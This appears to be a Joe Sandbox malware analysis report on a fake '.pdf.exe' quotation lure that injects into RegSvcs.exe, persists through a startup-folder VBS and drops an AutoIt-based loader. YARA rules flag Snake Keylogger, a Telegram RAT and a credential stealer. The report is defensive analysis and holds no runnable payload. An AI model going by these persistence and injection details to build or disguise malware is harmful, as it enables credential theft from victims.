Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe"
Imagebase:	0x7c0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4574535869.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4574535869.0000000002C7A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	07:44:55
Start date:	18/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs"
Imagebase:	0x7ff7d2a70000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:44:56
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\silvexes\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\silvexes\palladiums.exe"
Imagebase:	0x4f0000
File size:	1'131'008 bytes
MD5 hash:	7D291DA9B6E5251A9A22673230884B5F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:44:59
Start date:	18/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\silvexes\palladiums.exe"
Imagebase:	0xe10000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4574423762.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	4.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	53

Executed Functions

Function 002042DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0020430D

Part of subcall function 00206B57: _wcslen.LIBCMT ref: 00206B6A

GetCurrentProcess.KERNEL32(?,0029CB64,00000000,?,?), ref: 00204422
IsWow64Process.KERNEL32(00000000,?,?), ref: 00204429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00204454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00204466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00204474
FreeLibrary.KERNEL32(00000000,?,?), ref: 0020447B
GetSystemInfo.KERNEL32(?,?,?), ref: 002044A0

Strings

kernel32.dll, xrefs: 0020444F
GetNativeSystemInfo, xrefs: 00204460
|O, xrefs: 002436F8

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: f125783468705732e1a1fd483450d75bccb792d427c11c04d9a6ec856d1b3edd
Instruction ID: b5f4e8fbfd5a1230faa4e949849545b77afb23c47b743b20b99388fff50ee8b6
Opcode Fuzzy Hash: f125783468705732e1a1fd483450d75bccb792d427c11c04d9a6ec856d1b3edd
Instruction Fuzzy Hash: 22A1B4A2D2B3C1FFC795DB69BC4D1957FA5AB26300B1884DBE08193EA2D2704D74CB25

Function 002042A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,002050AA,?,?,00000000,00000000), ref: 002042B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002050AA,?,?,00000000,00000000), ref: 002042C9
LoadResource.KERNEL32(?,00000000,?,?,002050AA,?,?,00000000,00000000,?,?,?,?,?,?,00204F20), ref: 002435BE
SizeofResource.KERNEL32(?,00000000,?,?,002050AA,?,?,00000000,00000000,?,?,?,?,?,?,00204F20), ref: 002435D3
LockResource.KERNEL32(002050AA,?,?,002050AA,?,?,00000000,00000000,?,?,?,?,?,?,00204F20,?), ref: 002435E6

Strings

SCRIPT, xrefs: 002042BF

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: a07192d9ebc03a546002cf8e5b243b4bf824004fe8a8be852f07706023eed763
Instruction ID: b9fdb8b1f72b58d9c632cb234651ff1dea647e89e0f30b6b6b82681ecfab84b3
Opcode Fuzzy Hash: a07192d9ebc03a546002cf8e5b243b4bf824004fe8a8be852f07706023eed763
Instruction Fuzzy Hash: 71117CB0610701BFEB219F65EC48F677BB9EBC5B51F20816AB902D6290DB71D8108630

Function 00242BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00202B6B

Part of subcall function 00203A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002D1418,?,00202E7F,?,?,?,00000000), ref: 00203A78

Part of subcall function 00209CB3: _wcslen.LIBCMT ref: 00209CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,002C2224), ref: 00242C10
ShellExecuteW.SHELL32(00000000,?,?,002C2224), ref: 00242C17

Strings

runas, xrefs: 00242C0B

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 52d24dcfcf9b225ed02e4d421a197fc4bd5691ea2241c43fd76ec5c4bb4d8ba7
Instruction ID: e2d84b4cf3d1b40a67042554838e3e5275669bb192ccffed00b284f6614f2e80
Opcode Fuzzy Hash: 52d24dcfcf9b225ed02e4d421a197fc4bd5691ea2241c43fd76ec5c4bb4d8ba7
Instruction Fuzzy Hash: 0011E731624341AAC704FF60D85AABE77A89B91304F44146EF042520E3CF20997DCB52

Function 0026DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00245222), ref: 0026DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0026DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0026DBEE
FindClose.KERNEL32(00000000), ref: 0026DBFA

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: fd828eed5a0bcbd6a32b21c402c1d106218d4211053b9e707bed1c3e14fb7d98
Instruction ID: 370967a2b6df8efbc8fe01203f399eb2f17250cb4667dbe982c407e33542ca17
Opcode Fuzzy Hash: fd828eed5a0bcbd6a32b21c402c1d106218d4211053b9e707bed1c3e14fb7d98
Instruction Fuzzy Hash: FBF0A030C2091857C220AF7CAC0D8AA376C9E01334BA04707F836C20E0EBB159E486D9

Function 0020BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

p#-, xrefs: 002507CE

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: BuffCharUpper
String ID: p#-
API String ID: 3964851224-1355192918
Opcode ID: 1ea22092f093154342a7adc058e7e1ffa4eccafeb2c18a7479f5a510ed4d062f
Instruction ID: 633399b70ab282d67fbb120002903cf61b229321b655fb36ae75d2e203c225c4
Opcode Fuzzy Hash: 1ea22092f093154342a7adc058e7e1ffa4eccafeb2c18a7479f5a510ed4d062f
Instruction Fuzzy Hash: C5A25BB06283418FD714CF14C480B6AB7E1BF99304F24896DE99A9B392D771EC65CF92

Function 0020D730 Relevance: 21.6, APIs: 14, Instructions: 618windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0020D807
timeGetTime.WINMM ref: 0020DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0020DB28
TranslateMessage.USER32(?), ref: 0020DB7B
DispatchMessageW.USER32(?), ref: 0020DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0020DB9F
Sleep.KERNEL32(0000000A), ref: 0020DBB1

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 6ae1ac95e3c034a469b3fd38f3f21eb7feb329070e7b2606f8637d330fa71ddd
Instruction ID: e3ca565a883ca4d2c21e84e3a48bd78290862a7b30426520744f658d5457d2ad
Opcode Fuzzy Hash: 6ae1ac95e3c034a469b3fd38f3f21eb7feb329070e7b2606f8637d330fa71ddd
Instruction Fuzzy Hash: 8142F330629342EFD728CF64C848BAAB7E4BF46305F14855EE855872D2D770E868CF96

Function 00202CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00202D07
RegisterClassExW.USER32(00000030), ref: 00202D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00202D42
InitCommonControlsEx.COMCTL32(?), ref: 00202D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00202D6F
LoadIconW.USER32(000000A9), ref: 00202D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00202D94

Strings

+, xrefs: 00202CF0
AutoIt v3 GUI, xrefs: 00202D23
0, xrefs: 00202CE9
TaskbarCreated, xrefs: 00202D37

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 8f5bd53e8581d377de13c2485013dc63e6965a3ab1f93a1293bc6fd721ac4995
Instruction ID: fe83d269493b22434e8f1a2cb25afb6b110d67f304db47637871b72e7f093244
Opcode Fuzzy Hash: 8f5bd53e8581d377de13c2485013dc63e6965a3ab1f93a1293bc6fd721ac4995
Instruction Fuzzy Hash: 6F21B2B5D52218AFEB00DFA4F85DADDBBB8FB08700F20411BE511A62A0D7B149548F91

Function 00238D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.", xrefs: 0023903A, 00238FD0, 00238FF2

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID: ."
API String ID: 0-2093358890
Opcode ID: 116b5b5761a723b808970ec05b666015132d8a74c9d1d5425afb0ed31589d1ae
Instruction ID: cd1fd830ae6981305fd929292d8100f6e6581af475ba2efbe8d375054771e535
Opcode Fuzzy Hash: 116b5b5761a723b808970ec05b666015132d8a74c9d1d5425afb0ed31589d1ae
Instruction Fuzzy Hash: FAC1E4B4D2434AEFDB15DFA8D845BADBBB0AF0A310F144199F814AB392C7748991CF60

Function 0024065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0024039A: CreateFileW.KERNELBASE(00000000,00000000,?,00240704,?,?,00000000,?,00240704,00000000,0000000C), ref: 002403B7

GetLastError.KERNEL32 ref: 0024076F
__dosmaperr.LIBCMT ref: 00240776
GetFileType.KERNELBASE(00000000), ref: 00240782
GetLastError.KERNEL32 ref: 0024078C
__dosmaperr.LIBCMT ref: 00240795
CloseHandle.KERNEL32(00000000), ref: 002407B5
CloseHandle.KERNEL32(?), ref: 002408FF
GetLastError.KERNEL32 ref: 00240931
__dosmaperr.LIBCMT ref: 00240938

Strings

H, xrefs: 002408BD

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: fa59d16149e8fc4844a7c033801ef29f764fe2b83bb36fa2f8271451863ed38f
Instruction ID: e8c93175ba515a2688bc1f8a870cf69565f8592be85ec70ae073dc6ccf5f84c0
Opcode Fuzzy Hash: fa59d16149e8fc4844a7c033801ef29f764fe2b83bb36fa2f8271451863ed38f
Instruction Fuzzy Hash: CCA14732A201158FDF1DAF68D895BAD7BB0EB06320F24015EF9159F291CB349C62CF91

Function 0020344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00203A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002D1418,?,00202E7F,?,?,?,00000000), ref: 00203A78

Part of subcall function 00203357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00203379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0020356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0024318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002431CE
RegCloseKey.ADVAPI32(?), ref: 00243210
_wcslen.LIBCMT ref: 00243277
_wcslen.LIBCMT ref: 00243286

Strings

Software\AutoIt v3\AutoIt, xrefs: 00203560
\Include\, xrefs: 00203527
\, xrefs: 0024328C
Include, xrefs: 00243184, 002431C5

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 05eca02ebdc38c26e714a27b68f2b2ef13860907071d213ecb7aac44bdc48448
Instruction ID: fdca7d1f4d720d3dce842891ded1ce40520c3785b98803f47061ec0a8ec57c76
Opcode Fuzzy Hash: 05eca02ebdc38c26e714a27b68f2b2ef13860907071d213ecb7aac44bdc48448
Instruction Fuzzy Hash: 2071AD71925301DEC344EF69EC8686BBBE8FFA5340F40042EF545931A1EB708A58CF61

Function 00202B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00202B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00202B9D
LoadIconW.USER32(00000063), ref: 00202BB3
LoadIconW.USER32(000000A4), ref: 00202BC5
LoadIconW.USER32(000000A2), ref: 00202BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00202BEF
RegisterClassExW.USER32(?), ref: 00202C40

Part of subcall function 00202CD4: GetSysColorBrush.USER32(0000000F), ref: 00202D07
Part of subcall function 00202CD4: RegisterClassExW.USER32(00000030), ref: 00202D31
Part of subcall function 00202CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00202D42
Part of subcall function 00202CD4: InitCommonControlsEx.COMCTL32(?), ref: 00202D5F
Part of subcall function 00202CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00202D6F
Part of subcall function 00202CD4: LoadIconW.USER32(000000A9), ref: 00202D85
Part of subcall function 00202CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00202D94

Strings

AutoIt v3, xrefs: 00202C2F
#, xrefs: 00202C16
0, xrefs: 00202C0F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: e22e853f66927e66dc865f623577199c5b5646ac90b61a184102b4277b2564f4
Instruction ID: 5431dd4643c46326e53ec13b3caaa388964e620f082a38e3002ada5343ed5413
Opcode Fuzzy Hash: e22e853f66927e66dc865f623577199c5b5646ac90b61a184102b4277b2564f4
Instruction Fuzzy Hash: C7213A70E52314BBDB509FE5FC4DAA9BFB8FB08B50F50019BE504A6AA0D3B10960CF90

Function 00203170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0020316A,?,?), ref: 002031D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0020316A,?,?), ref: 00203204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00203227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0020316A,?,?), ref: 00203232
CreatePopupMenu.USER32 ref: 00203246
PostQuitMessage.USER32(00000000), ref: 00203267

Strings

TaskbarCreated, xrefs: 0020322D

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 84202cef4028193e954ff71a510e55941dc6034237841b8e8c709a0b2d73f9c2
Instruction ID: 6adff9a756f0fe4b13f0d3a40d49af829d6ed47bbe209577d08d3d60b33d7520
Opcode Fuzzy Hash: 84202cef4028193e954ff71a510e55941dc6034237841b8e8c709a0b2d73f9c2
Instruction Fuzzy Hash: 89411735670301BBDB149FB8AC2DBB9775DEB09340F140117F906866E3CBA19EB09B61

Function 0020DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%-, xrefs: 0025302D
D%-D%-, xrefs: 0020E27E
D%-, xrefs: 0020E4B1
D%-, xrefs: 00252FDA
D%-, xrefs: 0020E1E0
Variable must be of type 'Object'., xrefs: 002532B7

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
